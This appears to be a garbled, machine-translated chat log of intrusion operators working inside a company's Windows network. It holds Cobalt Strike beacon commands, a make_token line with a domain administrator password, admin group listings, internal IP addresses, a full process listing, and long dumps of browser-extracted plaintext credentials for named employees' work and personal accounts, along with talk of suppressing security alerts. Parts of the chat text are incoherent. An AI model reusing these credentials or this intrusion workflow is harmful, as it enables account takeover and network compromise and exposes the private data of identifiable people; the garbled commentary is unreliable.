`takehq.com give me a passport session i asked to leave for the maila why did you put out the socks?) not a folder there history file should lie hezh? 1 megabyte fftam and chrome `asdvtgr5erqwdf` and go to the ortn try it yourself pick me pliz history file i can not believe that not dumpedda it does not have a fox?I don't know if it's a good idea to get it from her, but I'm not sure if it's a good idea to get it from her, I just don't know if it's a good idea to get it from her.
```
DA
Members
-------------------------------------------------------------------------------
Administrator arobinsona cancelet
kaseyaservice O365Service sagert
The command completed successfully.
```
```
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
RTP-Admins_Ent
vmbackup
The command completed successfully.
``Error when opening the archive-rezip Symantec Endpoint Protection
Kaspersky Endpoint Security 10 for Windows
And some https://www.kaseya.com
```
DA
Members
-------------------------------------------------------------------------------
Administrator adonixadmin alloyamms
Angel barracuda BarracudaBUP
bbuerck BGW CAncelet
canceleta cevansa citrix_svc
DHaase EntAdmin gahbarracuda
orgbarracuda sagert Services_Backup
Uptime veeam wstangea
```
```
EA
Members
-------------------------------------------------------------------------------
Administrator EntAdmin Services_Backup
Uptime wstangea
The command completed successfully.
```
```
LA richmonddc1
Members
-------------------------------------------------------------------------------
Administrator
adonixadmin
Domain Admins
EntAdmin
Enterprise Admins
sagert
Services_Backup
smonitor
Uptime
The command completed successfully.
``````
[*] Beginning Edge Extraction.
--- Chromium Credential (User: mharper) ---
URL : https://id.atlassian.com/signup/invite
Username : mharper@waterway.com
Password : LoveUnit14#
[*] Finished Edge extraction.
What's in the hedgehog, if sharpweb is dead, I check the files in gkeller\g$ so what's in the hedgehog?
http://192.168.0.80/
http://192.168.0.11/
http://192.168.0.43/
http://192.168.0.57/
http://192.168.0.47/
http://192.168.0.121:8080/
``Check out chrome, the hedgehog and the hedgehog didn't check out``` so I downloaded the profile of the ff and the browsers from it?
File Not Found
``File Guess What```
Volume in drive C is Windows
Volume Serial Number is A6E5-1986
``Do then ``dir C:\users\*.rdg /s`` is not there this password has a session? I also asked to see the rdp there from-guesspolzak and taka and what about the takapolzak from what taka? or sharpChrome?it's from where? i see it's just there, i can't see the password if it's not waterway99! let me try there's a saved password i'll tell you more last time bingo was in the history ffugaday where did bingo know? 49655 https://infosight.hpe.com/app/login HPE InfoSight | Hewlett Packard Enterprise 1 0 13250782013357001watch the admins on the rdp interestingI by the way the web port does not work there
127.0.1.1:3389
127.0.1.1:445
maybe it's true....keep all mail accesses nearby to clean up the alerts if we find nimble accesses by the way i figured it was a redirect to 127.0.0.1 noticed this message long time ago when i was going through the mail using the word nimble so i fucked up my time :` `
beacon> shell ping -a 127.0.1.1
[*] Tasked beacon to run: ping -a 127.0.1.1.
[+] host called home, sent: 48 bytes
[+] received output:
Pinging 127.0.1.1 with 32 bytes of data:
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128
Ping statistics for 127.0.1.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
beacon> shell nslookup 127.0.1.1
[*] Tasked beacon to run: nslookup 127.0.1.1
[+] host called home, sent: 49 bytes
[+] received output:
*** wwdc2.waterway.com can't find 127.0.1.1: Non-existent domain
Server: wwdc2.waterway.com
Address: 192.168.0.222
and the other 50% is another way is 50%[ ](https://mediaeveryone.com/group/waterway-com?msg=HjARdNfzFS88zuRew) take into account the fact that they mb tupo badly configured it can immediately nslookup[ ](https://mediaeveryone.com/group/waterway-com?msg=8APBAwuecQy7S2Etk) no, it's a chip. last logon write during login) pinging from the network 127.0.1.1 is a service crap for spam mail tact "with itself" is not 127.0.0.so for ssh would be third-party iptipo they go there(?) well ssh isa127.0.1.1.1 there is writing root login from if you mean what I wrote abovein meaning? just smssochki strange-nimbeltam eto gde tam rd port open? tell me on the request for password while i see that they complain "i forgot my password from my kankuntemr((( "and here rakspeyspro nimbly here are samesochki come on the desktop nothing interesting?
```
netstat /p tcp /a | findstr 3389
``anything on the desktop? Look where the rdp opens in the ff, nothing interesting
URL : https://mail.datotel.com/
Username : hd@waterway.com
Password : Waterway1
```
did you check this e-mail? that's how we haven't found it yet they seem to have a vendor database with this kind of access
--- Chromium Credential (User: mapusatera) ---
URL : http://wwsql01/
Username : sa
Password : sa
``````
--- Chromium Credential (User: mapusatera) ---
URL : https://auth.monday.com/users/invitation/accept
Username : 3146293823
Password : BlML#D6oJ155
--- Chromium Credential (User: mapusatera) ---
URL : https://waterwaycarwash.monday.com/users/sign_in
Username : 3146293823
Password : BlML#D6oJ155
--- Chromium Credential (User: mapusatera) ---
URL : https://www.cnn.com/account/register
Username : 63367
Password : Wf$.tP-sF2Z4pF*
--- Chromium Credential (User: mapusatera) ---
URL : https://aim.luminatehealth.com/login
Username : michaelpusatera@gmail.com
Password : kUVkch.4M.YBR9X
--- Chromium Credential (User: mapusatera) ---
URL :
Username : michaelpusatera@gmail.com
Password : 715Drew
--- Chromium Credential (User: mapusatera) ---
URL : https://www.hollisterco.com/shop/OrderItemDisplayView
Username :
Password : N-nC2c*bTB_C-v-
--- Chromium Credential (User: mapusatera) ---
URL : https://shop.lululemon.com/shop/checkout/confirmation
Username : amybrinkman13@gmail.com
Password : fws5z&mQtf5WUVH
--- Chromium Credential (User: mapusatera) ---
URL : https://www.ae.com/us/en/cart
Username : morganpusatera@icloud.com
Password : ILOVEDANCE123\
[*] Finished Google Chrome extraction.
[*] Beginning Edge Extraction.
--- Chromium Credential (User: mapusatera) ---
URL : https://system.netsuite.com/
Username : mpusatera@sotelsystems.com
Password :
--- Chromium Credential (User: mapusatera) ---
URL : https://login5.silverpop.com/
Username : transact@waterway.com
Password : $tqMy2K5%T#r
--- Chromium Credential (User: mapusatera) ---
URL : http://wwsql01/
Username : sa
Password : sa
--- Chromium Credential (User: mapusatera) ---
URL : https://login.live.com/
Username : map@waterway.com
Password :
--- Chromium Credential (User: mapusatera) ---
URL : http://reportserver.waterway.com/
Username : sa
Password :
--- Chromium Credential (User: mapusatera) ---
URL : https://login5.silverpop.com/
Username : map@waterway.com
Password : %0%f#rC!5vJj
--- Chromium Credential (User: mapusatera) ---
URL : https://mail.datotel.com/
Username : hd@waterway.com
Password : Waterway1
--- Chromium Credential (User: mapusatera) ---
URL : http://reportserver.waterway.com/
Username : waterway\administrator
Password :
--- Chromium Credential (User: mapusatera) ---
URL : https://signin.quicken.com/
Username : michaelpusatera@gmail.com
Password :
--- Chromium Credential (User: mapusatera) ---
URL : https://www.waterway.com/
Username : michaelpusatera@gmail.com
Password : fgSrBr%2#cJx
--- Chromium Credential (User: mapusatera) ---
URL : https://login.live.com/
Username : michaelpusatera@gmail.com
Password : Richie42
I'll take a look, while you take off the chrome and explore the car, I see he has a FF thank you
make_token WATERWAY\Administrator 1853Gators
``Give me an admin account for the token
Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 8 K NT AUTHORITY\SYSTEM 29:59:15
System 4 Services 0 1,240 K N/A 0:05:27
Secure System 72 Services 0 40,344 K NT AUTHORITY\SYSTEM 0:00:00
Registry 132 Services 0 103,088 K NT AUTHORITY\SYSTEM 0:00:07
smss.exe 520 Services 0 1,136 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 896 Services 0 4,932 K NT AUTHORITY\SYSTEM 0:00:04
wininit.exe 988 Services 0 6,092 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 996 Console 1 3,936 K NT AUTHORITY\SYSTEM 0:00:00
services.exe 816 Services 0 14,728 K NT AUTHORITY\SYSTEM 0:06:11
LsaIso.exe 644 Services 0 2,844 K NT AUTHORITY\SYSTEM 0:00:00
lsass.exe 788 Services 0 28,512 K NT AUTHORITY\SYSTEM 0:00:30
svchost.exe 1136 Services 0 28,364 K NT AUTHORITY\SYSTEM 0:00:05
WUDFHost.exe 1164 Services 0 7,648 K NT AUTHORITY\LOCAL SERVICE 0:00:00
fontdrvhost.exe 1200 Services 0 3,300 K Font Driver Host\UMFD-0 0:00:00
winlogon.exe 1288 Console 1 8,348 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 1348 Services 0 17,564 K NT AUTHORITY\NETWORK SERVICE 0:00:20
svchost.exe 1400 Services 0 10,344 K NT AUTHORITY\SYSTEM 0:00:04
fontdrvhost.exe 1424 Console 1 2,720 K Font Driver Host\UMFD-1 0:00:00
LogonUI.exe 1508 Console 1 51,348 K NT AUTHORITY\SYSTEM 0:00:03
svchost.exe 1612 Services 0 177,256 K NT AUTHORITY\NETWORK SERVICE 0:03:30
svchost.exe 1660 Services 0 7,028 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 1668 Services 0 7,484 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 1676 Services 0 4,864 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 1684 Services 0 10,660 K NT AUTHORITY\LOCAL SERVICE 0:00:00
dwm.exe 1696 Console 1 33,872 K Window Manager\DWM-1 0:00:00
svchost.exe 1704 Services 0 6,136 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 1712 Services 0 10,664 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 1732 Services 0 5,060 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 1920 Services 0 8,768 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 1928 Services 0 6,904 K NT AUTHORITY\LOCAL SERVICE 0:00:01
svchost.exe 1936 Services 0 11,164 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 876 Services 0 9,372 K NT AUTHORITY/NETWORK SERVICE 0:00:06
svchost.exe 1480 Services 0 15,148 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 2096 Services 0 5,948 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2132 Services 0 6,864 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2168 Services 0 17,260 K NT AUTHORITY\LOCAL SERVICE 0:00:36
svchost.exe 2196 Services 0 8,172 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 2208 Services 0 13,320 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 2256 Services 0 18,528 K NT AUTHORITY\LOCAL SERVICE 0:00:05
svchost.exe 2444 Services 0 9,292 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 2524 Services 0 10,280 K NT AUTHORITY/NETWORK SERVICE 0:00:03
svchost.exe 2580 Services 0 5,760 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 2716 Services 0 7,184 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2728 Services 0 16,268 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2776 Services 0 8,380 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 2824 Services 0 24,512 K NT AUTHORITY\SYSTEM 0:02:36
svchost.exe 2892 Services 0 9,584 K NT AUTHORITY\SYSTEM 0:00:00
vmms.exe 3060 Services 0 22,292 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3128 Services 0 6,976 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3156 Services 0 7,048 K NT AUTHORITY\LOCAL SERVICE 0:00:01
svchost.exe 3168 Services 0 6,508 K NT AUTHORITY\LOCAL SERVICE 0:00:00
NVDisplay.Container.exe 3276 Services 0 16,440 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 3284 Services 0 10,532 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3296 Services 0 10,420 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3384 Services 0 8,780 K NT AUTHORITY\NETWORK SERVICE 0:00:00
svchost.exe 3480 Services 0 8,792 K NT AUTHORITY\SYSTEM 0:00:33
svchost.exe 3488 Services 0 5,508 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3496 Services 0 7,696 K NT AUTHORITY\LOCAL SERVICE 0:00:01
svchost.exe 3664 Services 0 6,560 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3672 Services 0 9,656 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3768 Services 0 9,088 K NT AUTHORITY\SYSTEM 0:00:00
Memory Compression 3776 Services 0 420,412 K NT AUTHORITY\SYSTEM 0:00:24
svchost.exe 3876 Services 0 7,652 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3888 Services 0 7,524 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 3996 Services 0 8,412 K NT AUTHORITY\SYSTEM 0:00:00
dasHost.exe 4300 Services 0 10,316 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 4364 Services 0 7,416 K NT AUTHORITY\LOCAL SERVICE 0:00:00
vmcompute.exe 4500 Services 0 6,648 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 4520 Services 0 13,532 K NT AUTHORITY\LOCAL SERVICE 0:00:03
svchost.exe 4592 Services 0 5,808 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 4600 Services 0 8,532 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 4640 Services 0 6,684 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 4768 Services 0 12,944 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 4812 Services 0 15,420 K NT AUTHORITY\SYSTEM 0:00:09
spoolsv.exe 4864 Services 0 28,180 K NT AUTHORITY\SYSTEM 0:00:01
armsvc.exe 4956 Services 0 5,900 K NT AUTHORITY\SYSTEM 0:00:00
winagent.exe 4972 Services 0 23,628 K NT AUTHORITY\SYSTEM 0:00:16
BASupSrvc.exe 5012 Services 0 22,820 K NT AUTHORITY\SYSTEM 0:00:05
AdobeUpdateService.exe 5032 Services 0 7,080 K NT AUTHORITY\SYSTEM 0:00:00
BASupSrvcUpdater.exe 5048 Services 0 15,524 K NT AUTHORITY\SYSTEM 0:00:02
AGMService.exe 5076 Services 0 10,448 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 5100 Services 0 8,764 K NT AUTHORITY\SYSTEM 0:00:00
BtwRSupportService.exe 5116 Services 0 6,920 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2308 Services 0 12,940 K NT AUTHORITY\NETWORK SERVICE 0:00:00
CarboniteService.exe 4556 Services 0 130,688 K NT AUTHORITY\SYSTEM 1:30:52
BtSwitcherService.exe 4808 Services 0 6,400 K NT AUTHORITY\SYSTEM 0:00:00
CsrBtService.exe 5128 Services 0 8,532 K NT AUTHORITY\SYSTEM 0:00:00
CsrBtOBEXService.exe 5136 Services 0 7,468 K NT AUTHORITY\SYSTEM 0:00:00
AGSService.exe 5144 Services 0 10,000 K NT AUTHORITY\SYSTEM 0:00:00
officeclicktorun.exe 5168 Services 0 29,316 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 5244 Services 0 34,896 K NT AUTHORITY\SYSTEM 0:00:12
svchost.exe 5252 Services 0 40,360 K NT AUTHORITY\LOCAL SERVICE 0:00:11
EPIntegrationService.exe 5264 Services 0 16,884 K NT AUTHORITY\SYSTEM 0:00:02
EPUpdateService.exe 5344 Services 0 9,172 K NT AUTHORITY\SYSTEM 0:00:02
EPSecurityService.exe 5352 Services 0 405,312 K NT AUTHORITY\SYSTEM 0:04:30
EPProtectedService.exe 5388 Services 0 8,252 K NT AUTHORITY\SYSTEM 0:00:00
bdredline.exe 5404 Services 0 12,116 K NT AUTHORITY\SYSTEM 0:00:00
fbguard.exe 5488 Services 0 6,244 K NT AUTHORITY\SYSTEM 0:00:00
MSOIDSVC.EXE 5636 Services 0 15,232 K NT AUTHORITY\SYSTEM 0:00:00
jhi_service.exe 5720 Services 0 5,964 K NT AUTHORITY\SYSTEM 0:00:00
KiteService.exe 5728 Services 0 29,228 K NT AUTHORITY\SYSTEM 0:00:00
IpOverUsbSvc.exe 5748 Services 0 12,316 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 5760 Services 0 8,816 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 5772 Services 0 12,832 K NT AUTHORITY\LOCAL SERVICE 0:00:01
svchost.exe 5780 Services 0 5,412 K NT AUTHORITY\SYSTEM 0:00:00
erlsrv.exe 5792 Services 0 3,472 K NT AUTHORITY\SYSTEM 0:00:00
sqlwriter.exe 5800 Services 0 7,788 K NT AUTHORITY\SYSTEM 0:00:00
CsrBtAudioService.exe 5808 Services 0 7,924 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 5828 Services 0 10,188 K NT AUTHORITY\SYSTEM 0:00:00
RedGate.Client.Service.ex 5820 Services 0 56,536 K NT AUTHORITY\SYSTEM 0:00:06
cygrunsrv.exe 5844 Services 0 5,784 K NT AUTHORITY\SYSTEM 0:00:00
cygrunsrv.exe 5856 Services 0 5,800 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 5888 Services 0 18,580 K NT AUTHORITY\SYSTEM 0:00:00
agent.exe 5912 Services 0 148,340 K NT AUTHORITY\SYSTEM 0:01:22
svchost.exe 5928 Services 0 5,912 K NT AUTHORITY\LOCAL SERVICE 0:00:00
cygrunsrv.exe 5936 Services 0 5,752 K NT AUTHORITY\SYSTEM 0:00:00
nvcontainer.exe 5952 Services 0 31,552 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 6040 Services 0 5,600 K NT AUTHORITY\LOCAL SERVICE 0:00:00
erl.exe 6112 Services 0 23,400 K NT AUTHORITY\SYSTEM 0:03:59
fbserver.exe 6232 Services 0 6,712 K NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 6248 Services 0 5,312 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 6404 Services 0 7,052 K NT AUTHORITY/NETWORK SERVICE 0:00:00
MSOIDSVCM.EXE 6772 Services 0 5,540 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 6880 Services 0 6,880 K NT AUTHORITY\LOCAL SERVICE 0:00:01
cygrunsrv.exe 6968 Services 0 7,080 K NT AUTHORITY\SYSTEM 0:00:00
cygrunsrv.exe 7100 Services 0 7,120 K NT AUTHORITY\SYSTEM 0:00:00
epmd.exe 7284 Services 0 3,492 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 7316 Services 0 12,360 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 7408 Services 0 6,956 K NT AUTHORITY\NETWORK SERVICE 0:00:00
sqlservr.exe 7656 Services 0 243,216 K NT SERVICE\MSSQLSERVER 0:09:42
unsecapp.exe 7716 Services 0 6,536 K NT AUTHORITY\SYSTEM 0:00:00
sqlceip.exe 7820 Services 0 41,456 K NT SERVICE\SQLTELEMETRY 0:00:02
conhost.exe 8448 Services 0 7,544 K NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 8516 Services 0 7,384 K NT AUTHORITY\SYSTEM 0:00:00
alprlink.exe 8636 Services 0 17,492 K NT AUTHORITY\SYSTEM 0:00:00
alprd.exe 8704 Services 0 196,332 K NT AUTHORITY\SYSTEM 0:00:08
conhost.exe 8816 Services 0 7,392 K NT AUTHORITY\SYSTEM 0:00:00
beanstalkd.exe 8912 Services 0 5,364 K NT AUTHORITY\SYSTEM 0:00:01
rundll32.exe 8924 Console 1 6,580 K NT AUTHORITY\SYSTEM 0:00:00
NVDisplay.Container.exe 8292 Console 1 37,580 K NT AUTHORITY\SYSTEM 0:00:04
WmiPrvSE.exe 8264 Services 0 54,308 K NT AUTHORITY\SYSTEM 0:00:18
svchost.exe 9464 Services 0 8,284 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 10772 Services 0 15,412 K NT AUTHORITY/NETWORK SERVICE 0:00:05
svchost.exe 10896 Services 0 10,804 K NT AUTHORITY\SYSTEM 0:00:03
NableSixtyFourBitManager. 11368 Services 0 23,952 K NT AUTHORITY\SYSTEM 0:00:41
conhost.exe 11376 Services 0 4,756 K NT AUTHORITY\SYSTEM 0:00:00
NableReactiveManagement.e 11408 Services 0 32,052 K NT AUTHORITY\SYSTEM 0:00:01
conhost.exe 11420 Services 0 4,760 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 11636 Services 0 13,736 K NT AUTHORITY\SYSTEM 0:00:00
fdlauncher.exe 11784 Services 0 4,376 K NT SERVICE\MSSQLFDLauncher 0:00:00
Launchpad.exe 11792 Services 0 16,268 K NT SERVICE\MSSQLLaunchpad 0:00:00
fdhost.exe 11868 Services 0 6,328 K NT SERVICE\MSSQLFDLauncher 0:00:00
conhost.exe 11876 Services 0 4,672 K NT SERVICE\MSSQLFDLauncher 0:00:00
win32sysinfo.exe 12240 Services 0 2,348 K NT AUTHORITY\SYSTEM 0:00:00
inet_gethethost.exe 5332 Services 0 4,584 K NT AUTHORITY\SYSTEM 0:00:00
SolarWinds.MSP.CacheServi 13132 Services 0 37,972 K NT AUTHORITY\LOCAL SERVICE 0:00:03
SolarWinds.MSP.RpcServerS 13244 Services 0 48,160 K NT AUTHORITY\SYSTEM 0:00:06
dllhost.exe 12684 Services 0 10,632 K NT AUTHORITY\SYSTEM 0:00:00
fmplugin.exe 9848 Services 0 28,400 K NT AUTHORITY\SYSTEM 0:00:13
conhost.exe 9832 Services 0 7,776 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 1304 RDP-Tcp#2 2 6,464 K NT AUTHORITY\SYSTEM 0:00:16
winlogon.exe 1532 RDP-Tcp#2 2 2 9,268 K NT AUTHORITY\SYSTEM 0:00:00
WUDFHost.exe 2220 Services 0 68,012 K NT AUTHORITY\LOCAL SERVICE 0:03:59
fontdrvhost.exe 2744 RDP-Tcp#2 2 8,708 K Font Driver Host\UMFD-2 0:00:01
dwm.exe 4320 RDP-Tcp#2 2 87,008 K Window Manager\DWM-2 0:01:17
NVDisplay.Container.exe 5576 RDP-Tcp#2 2 2 50,612 K NT AUTHORITY\SYSTEM 0:00:02
svchost.exe 6276 Services 0 7,112 K NT AUTHORITY\SYSTEM 0:00:00
EPConsole.exe 11732 RDP-Tcp#2 2 1,220 K WATERWAY\mapusatera 0:00:03
rdpclip.exe 3540 RDP-Tcp#2 2 11,648 K WATERWAY\mapusatera 0:00:11
nvcontainer.exe 11124 RDP-Tcp#2 2 23,532 K WATERWAY\mapusatera 0:00:02
sihost.exe 4508 RDP-Tcp#2 2 26,852 K WATERWAY\mapusatera 0:00:04
nvcontainer.exe 3140 RDP-Tcp#2 2 38,620 K WATERWAY\mapusatera 0:00:55
svchost.exe 11080 RDP-Tcp#2 2 26,112 K WATERWAY\mapusatera 0:00:44
svchost.exe 5672 RDP-Tcp#2 2 25,728 K WATERWAY\mapusatera 0:00:01
svchost.exe 12848 Services 0 20,636 K NT AUTHORITY\SYSTEM 0:00:01
taskhostw.exe 6836 RDP-Tcp#2 2 21,608 K WATERWAY\mapusatera 0:00:03
svchost.exe 8544 Services 0 7,808 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 11900 Services 0 18,716 K NT AUTHORITY\LOCAL SERVICE 0:00:00
ctfmon.exe 1768 RDP-Tcp#2 2 28,616 K WATERWAY\mapusatera 0:00:42
explorer.exe 13472 RDP-Tcp#2 2 175,424 K WATERWAY\mapusatera 0:01:37
NVIDIA Web Helper.exe 13484 RDP-Tcp#2 2 12,100 K WATERWAY\mapusatera 0:00:02
conhost.exe 13556 RDP-Tcp#2 2 2 1,268 K WATERWAY\mapusatera 0:00:00
svchost.exe 13708 RDP-Tcp#2 2 23,276 K WATERWAY\mapusatera 0:00:01
GoogleCrashHandler.exe 13812 Services 0 1,256 K NT AUTHORITY\SYSTEM 0:00:00
GoogleCrashHandler64.exe 13900 Services 0 1,296 K NT AUTHORITY\SYSTEM 0:00:00
StartMenuExperienceHost.e 13456 RDP-Tcp#2 2 60,176 K WATERWAY\mapusatera 0:00:01
RuntimeBroker.exe 13824 RDP-Tcp#2 2 24,052 K WATERWAY\mapusatera 0:00:00
SearchApp.exe 14232 RDP-Tcp#2 2 2 89,900 K WATERWAY\mapusatera 0:00:10
RuntimeBroker.exe 14348 RDP-Tcp#2 2 36,724 K WATERWAY\mapusatera 0:00:02
YourPhone.exe 14588 RDP-Tcp#2 2 6,244 K WATERWAY\mapusatera 0:00:00
svchost.exe 15044 Services 0 11,672 K NT AUTHORITY\SYSTEM 0:00:00
RuntimeBroker.exe 5240 RDP-Tcp#2 2 14,200 K WATERWAY\mapusatera 0:00:00
nvsphelper64.exe 15008 RDP-Tcp#2 2 11,572 K WATERWAY\mapusatera 0:00:00
NVIDIA Share.exe 15216 RDP-Tcp#2 2 44,948 K WATERWAY\mapusatera 0:00:05
NVIDIA Share.exe 15424 RDP-Tcp#2 2 29,452 K WATERWAY\mapusatera 0:00:00
NVIDIA Share.exe 15540 RDP-Tcp#2 2 2 50,808 K WATERWAY\mapusatera 0:00:01
SecurityHealthSystray.exe 16052 RDP-Tcp#2 2 9,176 K WATERWAY\mapusatera 0:00:00
SecurityHealthService.exe 16076 Services 0 12,740 K NT AUTHORITY\SYSTEM 0:00:00
NCentralRRDLdr.exe 16204 RDP-Tcp#2 2 11,012 K WATERWAY\mapusatera 0:00:00
RuntimeBroker.exe 16216 RDP-Tcp#2 2 23,284 K WATERWAY\mapusatera 0:00:03
NCentralRDViewer.exe 16256 RDP-Tcp#2 2 41,920 K WATERWAY\mapusatera 0:00:03
SgrmBroker.exe 14216 Services 0 8,856 K NT AUTHORITY\SYSTEM 0:00:02
SolarWinds.MSP.PME.Agent. 2288 Services 0 22,804 K NT AUTHORITY\SYSTEM 0:00:00
AgentMaint.exe 16328 Services 0 25,676 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 15380 Services 0 9,992 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 15616 RDP-Tcp#2 2 11,328 K WATERWAY\mapusatera 0:00:00
outlook.exe 15980 RDP-Tcp#2 2,340,144 K WATERWAY\mapusatera 0:05:42
chrome.exe 4656 RDP-Tcp#2 2,305,636 K WATERWAY\mapusatera 0:07:59
chrome.exe 13684 RDP-Tcp#2 2 6,852 K WATERWAY\mapusatera 0:00:00
chrome.exe 7272 RDP-Tcp#2 2 192,908 K WATERWAY\mapusatera 0:03:08
chrome.exe 15872 RDP-Tcp#2 2 73,628 K WATERWAY\mapusatera 0:01:53
chrome.exe 15140 RDP-Tcp#2 2 17,468 K WATERWAY\mapusatera 0:00:09
chrome.exe 13936 RDP-Tcp#2 2 67,464 K WATERWAY\mapusatera 0:00:15
chrome.exe 16380 RDP-Tcp#2 2 71,084 K WATERWAY\mapusatera 0:00:01
chrome.exe 15876 RDP-Tcp#2 2 132,800 K WATERWAY\mapusatera 0:00:55
chrome.exe 15948 RDP-Tcp#2 2 84,912 K WATERWAY\mapusatera 0:00:57
chrome.exe 15596 RDP-Tcp#2 2 2 71,180 K WATERWAY\mapusatera 0:00:11
TextInputHost.exe 16836 RDP-Tcp#2 2 43,968 K WATERWAY\mapusatera 0:00:03
chrome.exe 17156 RDP-Tcp#2 2 27,296 K WATERWAY\mapusatera 0:00:01
svchost.exe 17356 Services 0 9,956 K NT AUTHORITY\SYSTEM 0:00:00
chrome.exe 17412 RDP-Tcp#2 2 2 56,608 K WATERWAY\mapusatera 0:00:13
chrome.exe 1800 RDP-Tcp#2 2 2 87,588 K WATERWAY\mapusatera 0:00:20
chrome.exe 18900 RDP-Tcp#2 2 2,172,060 K WATERWAY\mapusatera 0:00:21
chrome.exe 2452 RDP-Tcp#2 2 49,728 K WATERWAY\mapusatera 0:00:20
chrome.exe 16772 RDP-Tcp#2 2 206,988 K WATERWAY\mapusatera 0:02:34
chrome.exe 16792 RDP-Tcp#2 2,205,424 K WATERWAY\mapusatera 0:01:59
chrome.exe 16808 RDP-Tcp#2 2 177,120 K WATERWAY\mapusatera 0:01:14
chrome.exe 19496 RDP-Tcp#2 2 2 88,640 K WATERWAY\mapusatera 0:00:03
chrome.exe 16876 RDP-Tcp#2 2 2 82,568 K WATERWAY\mapusatera 0:00:20
chrome.exe 16396 RDP-Tcp#2 2 2 17,668 K WATERWAY\mapusatera 0:00:00
chrome.exe 6036 RDP-Tcp#2 2 2 45,264 K WATERWAY\mapusatera 0:00:01
NableAVDBridge.exe 17592 Services 0 31,432 K NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 20648 Services 0 5,540 K NT AUTHORITY\SYSTEM 0:00:00
AdobeNotificationClient.e 21140 RDP-Tcp#2 2 3,848 K WATERWAY\mapusatera 0:00:00
RuntimeBroker.exe 10348 RDP-Tcp#2 2 12,900 K WATERWAY\mapusatera 0:00:00
svchost.exe 23088 Services 0 6,772 K NT AUTHORITY\SYSTEM 0:00:00
VSSVC.exe 24408 Services 0 10,372 K NT AUTHORITY\SYSTEM 0:00:16
svchost.exe 22936 Services 0 8,864 K NT AUTHORITY\SYSTEM 0:00:18
UserOOBEBroker.exe 12744 RDP-Tcp#2 2 9,628 K WATERWAY\mapusatera 0:00:00
svchost.exe 20932 Services 0 21,140 K NT AUTHORITY\SYSTEM 0:00:00
chrome.exe 21864 RDP-Tcp#2 2 225,636 K WATERWAY\mapusatera 0:00:29
chrome.exe 13324 RDP-Tcp#2 2,105,720 K WATERWAY\mapusatera 0:00:43
dllhost.exe 2232 RDP-Tcp#2 2 2 12,444 K WATERWAY\mapusatera 0:00:00
ApplicationFrameHost.exe 7964 RDP-Tcp#2 2 24,924 K WATERWAY\mapusatera 0:00:00
taskhostw.exe 25584 RDP-Tcp#2 2 18,996 K WATERWAY\mapusatera 0:00:00
iexplore.exe 25380 RDP-Tcp#2 2 2 31,936 K WATERWAY\mapusatera 0:00:00
